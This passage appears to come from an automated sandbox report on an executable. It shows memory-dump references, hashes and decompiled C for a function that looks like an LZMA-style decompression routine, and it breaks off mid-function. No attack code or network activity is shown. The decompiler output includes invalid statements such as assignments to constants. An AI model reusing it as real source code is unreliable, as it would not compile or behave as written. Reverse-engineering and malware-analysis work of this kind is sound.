                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00406a5a
                                                0x00406a60
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6b
                                                0x00406a72
                                                0x00406a76
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00406999
                                                0x00000000
                                                0x0040680e

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
